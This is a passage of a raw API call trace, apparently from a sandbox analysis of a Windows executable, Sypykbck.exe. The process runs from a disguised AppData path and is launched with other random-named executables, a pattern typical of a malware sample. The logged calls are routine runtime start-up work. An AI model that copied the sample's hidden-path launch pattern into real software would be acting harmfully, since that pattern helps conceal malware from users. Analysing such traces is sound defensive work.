dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x405699, hStdOutput=0x405a4c, hStdError=0x13907d0)) [0099.366] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0099.366] GetFileType (hFile=0x3) returned 0x0 [0099.366] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0099.366] GetFileType (hFile=0x7) returned 0x0 [0099.366] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0099.366] GetFileType (hFile=0xb) returned 0x0 [0099.366] SetHandleCount (uNumber=0x20) returned 0x20 [0099.366] GetCommandLineA () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\LSfkRHur.exe\" 2" [0099.366] GetEnvironmentStringsW () returned 0x1afd68* [0099.366] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=C:=C:\\Users\\EEBsYm5\\Desktop", cchWideChar=1033, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1033 [0099.366] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=C:=C:\\Users\\EEBsYm5\\Desktop", cchWideChar=1033, lpMultiByteStr=0x13911f8, cbMultiByte=1033, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=C:=C:\\Users\\EEBsYm5\\Desktop", lpUsedDefaultChar=0x0) returned 1033 [0099.366] FreeEnvironmentStringsW (penv=0x1afd68) returned 1 [0099.366] GetLastError () returned 0x6 [0099.366] SetLastError (dwErrCode=0x6) [0099.366] GetLastError () returned 0x6 [0099.366] SetLastError (dwErrCode=0x6) [0099.366] GetLastError () returned 0x6 [0099.366] SetLastError (dwErrCode=0x6) [0099.366] GetACP () returned 0x4e4 [0099.366] GetLastError () returned 0x6 [0099.366] SetLastError (dwErrCode=0x6) [0099.366] IsValidCodePage (CodePage=0x4e4) returned 1 [0099.366] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12fe84 | out: lpCPInfo=0x12fe84) returned 1 [0099.366] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12f950 | out: lpCPInfo=0x12f950) returned 1 [0099.367] GetLastError () returned 0x6 [0099.367] SetLastError (dwErrCode=0x6) [0099.367] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0099.367] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x12f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0099.367] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x12f964 | out: lpCharType=0x12f964) returned 1 [0099.367] GetLastError () returned 0x6 [0099.367] SetLastError (dwErrCode=0x6) [0099.367] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0099.367] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x12f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿꐊശAĀ") returned 256 [0099.367] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿꐊശAĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0099.367] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿꐊശAĀ", cchSrc=256, lpDestStr=0x12f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0099.367] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x12fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x73\x53\x54\xdb\x9c\xfe\x12", lpUsedDefaultChar=0x0) returned 256 [0099.367] GetLastError () returned 0x6 [0099.367] SetLastError (dwErrCode=0x6) [0099.367] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0099.367] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x12f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿꐊശAĀ") returned 256 [0099.367] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿꐊശAĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0099.367] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿꐊശAĀ", cchSrc=256, lpDestStr=0x12f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0099.367] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x12fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x73\x53\x54\xdb\x9c\xfe\x12", lpUsedDefaultChar=0x0) returned 256 [0099.368] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x421940, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\micros~1\\sypykbck.exe")) returned 0x34 [0099.368] GetLastError () returned 0x0 [0099.368] SetLastError (dwErrCode=0x0) [0099.368] GetLastError () returned 0x0 [0099.368] SetLastError (dwErrCode=0x0) [0099.368] GetLastError () returned 0x0 [0099.368] SetLastError (dwErrCode=0x0) [0099.368] GetLastError () returned 0x0 [0099.368] SetLastError (dwErrCode=0x0) [0099.368] GetLastError () returned 0x0 [0099.368] SetLastError (dwErrCode=0x0) [0099.368] GetLastError () returned 0x0 [0099.368] SetLastError (dwErrCode=0x0) [0099.368] GetLastError () returned 0x0 [0099.368] SetLastError (dwErrCode=0x0) [0099.368] GetLastError () returned 0x0 [0099.368] SetLastError (dwErrCode=0x0) [0099.368] GetLastError () returned 0x0 [0099.368] SetLastError (dwErrCode=0x0) [0099.368] GetLastError () returned 0x0 [0099.368] SetLastError (dwErrCode=0x0) [0099.368] GetLastError () returned 0x0 [0099.368] SetLastError (dwErrCode=0x0) [0099.368] GetLastError () returned 0x0 [0099.368] SetLastError (dwErrCode=0x0) [0099.368] GetLastError () returned 0x0 [0099.368] SetLastError (dwErrCode=0x0) [0099.369] GetLastError () returned 0x0 [0099.369] SetLastError (dwErrCode=0x0) [0099.369] GetLastError () returned 0x0 [0099.369] SetLastError (dwErrCode=0x0) [0099.369] GetLastError () returned 0x0 [0099.369] SetLastError (dwErrCode=0x0) [0099.369] GetLastError () returned 0x0 [0099.369] SetLastError (dwErrCode=0x0) [0099.369] GetLastError () returned 0x0 [0099.369] SetLastError (dwErrCode=0x0) [0099.369] GetLastError () returned 0x0 [0099.369] SetLastError (dwErrCode=0x0) [0099.369] GetLastError () returned 0x0 [0099.369] SetLastError (dwErrCode=0x0) [0099.369] GetLastError () returned 0x0 [0099.369] SetLastError (dwErrCode=0x0) [0099.369] GetLastError () returned 0x0 [0099.369] SetLastError (dwErrCode=0x0) [0099.369] GetLastError () returned 0x0 [0099.369] SetLastError (dwErrCode=0x0) [0099.369] GetLastError () returned 0x0 [0099.369] SetLastError (dwErrCode=0x0) [0099.369] GetLastError () returned 0x0 [0099.369] SetLastError (dwErrCode=0x0) [0099.369] GetLastError () returned 0x0 [0099.369] SetLastError (dwErrCode=0x0) [0099.369] GetLastError () returned 0x0 [0099.369] SetLastError (dwErrCode=0x0) [0099.369] GetLastError () returned 0x0 [0099.370] SetLastError (dwErrCode=0x0) [0099.370] GetLastError () returned 0x0 [0099.370] SetLastError (dwErrCode=0x0) [0099.370] GetLastError () returned 0x0 [0099.370] SetLastError (dwErrCode=0x0) [0099.370] GetLastError () returned 0x0 [0099.370] SetLastError (dwErrCode=0x0) [0099.370] GetLastError () returned 0x0 [0099.370] SetLastError (dwErrCode=0x0) [0099.370] GetLastError () returned 0x0 [0099.370] SetLastError (dwErrCode=0x0) [0099.370] GetLastError () returned 0x0 [0099.370] SetLastError (dwErrCode=0x0) [0099.370] GetLastError () returned 0x0 [0099.370] SetLastError (dwErrCode=0x0) [0099.370] GetLastError () returned 0x0 [0099.370] SetLastError (dwErrCode=0x0) [0099.370] GetLastError () returned 0x0 [0099.370] SetLastError (dwErrCode=0x0) [0099.370] GetLastError () returned 0x0 [0099.370] SetLastError (dwErrCode=0x0) [0099.370] GetLastError () returned 0x0 [0099.370] SetLastError (dwErrCode=0x0) [0099.370] GetLastError () returned 0x0 [0099.370] SetLastError (dwErrCode=0x0) [0099.370] GetLastError () returned 0x0 [0099.370] SetLastError (dwErrCode=0x0) [0099.370] GetLastError () returned 0x0 [0099.371] SetLastError (dwErrCode=0x0) [0099.371] GetLastError () returned 0x0 [0099.371] SetLastError (dwErrCode=0x0) [0099.371] GetLastError () returned 0x0 [0099.371] SetLastError (dwErrCode=0x0) [0099.371] GetLastError () returned 0x0 [0099.371] SetLastError (dwErrCode=0x0) [0099.371] GetLastError () returned 0x0 [0099.371] SetLastError (dwErrCode=0x0) [0099.371] GetLastError () returned 0x0 [0099.371] SetLastError (dwErrCode=0x0) [0099.371] GetLastError () returned 0x0 [0099.371] SetLastError (dwErrCode=0x0) [0099.371] GetLastError () returned 0x0 [0099.371] SetLastError (dwErrCode=0x0) [0099.371] GetLastError () returned 0x0 [0099.371] SetLastError (dwErrCode=0x0) [0099.371] GetLastError () returned 0x0 [0099.371] SetLastError (dwErrCode=0x0) [0099.371] GetLastError () returned 0x0 [0099.371] SetLastError (dwErrCode=0x0) [0099.371] GetLastError () returned 0x0 [0099.371] SetLastError (dwErrCode=0x0) [0099.371] GetLastError () returned 0x0 [0099.371] SetLastError (dwErrCode=0x0) [0099.371] GetLastError () returned 0x0 [0099.371] SetLastError (dwErrCode=0x0) [0099.371] GetLastError () returned 0x0 [0099.372] SetLastError (dwErrCode=0x0) [0099.372] GetLastError () returned 0x0 [0099.372] SetLastError (dwErrCode=0x0) [0099.372] GetLastError () returned 0x0 [0099.372] SetLastError (dwErrCode=0x0) [0099.372] GetLastError () returned 0x0 [0099.372] SetLastError (dwErrCode=0x0) [0099.372] GetLastError () returned 0x0 [0099.372] SetLastError (dwErrCode=0x0) [0099.372] GetLastError () returned 0x0 [0099.372] SetLastError (dwErrCode=0x0) [0099.372] GetLastError () returned 0x0 [0099.372] SetLastError (dwErrCode=0x0) [0099.372] GetLastError () returned 0x0 [0099.372] SetLastError 